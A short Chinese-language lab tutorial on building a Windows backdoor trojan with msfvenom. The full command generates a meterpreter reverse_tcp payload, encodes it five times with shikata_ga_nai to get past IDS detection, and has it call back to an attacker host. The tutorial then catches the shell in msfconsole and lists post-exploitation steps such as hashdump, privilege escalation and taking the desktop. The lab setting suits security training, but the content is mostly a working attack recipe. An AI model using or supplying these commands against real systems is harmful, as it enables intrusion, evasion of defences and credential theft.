工具:msfconsole、msfvenom、Kali Linux
角色分配:攻击者:Kali Linux 2016.1,IP 192.168.1.106;
受害者:Windows Server 2003,IP 192.168.1.101。
思路:通过msfvenom制作exe后门木马,并用shikata_ga_nai编码绕过IDS检测,利用msfconsole连接msfvenom服务并拿shell。
过程:
1.执行以下命令:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.106 LPORT=1234 -f exe > ./test.exe
2.将test.exe复制到受害者主机上
3.在Kali中输入msfconsole,并按照下图进行配置:
4.执行exploit,然后在受害者主机上运行test.exe后门木马,Metasploit接到反馈:
得到meterpreter后,可以执行getuid、hashdump以及提权操作,还可以通过getgui命令拿受害主机的图形界面。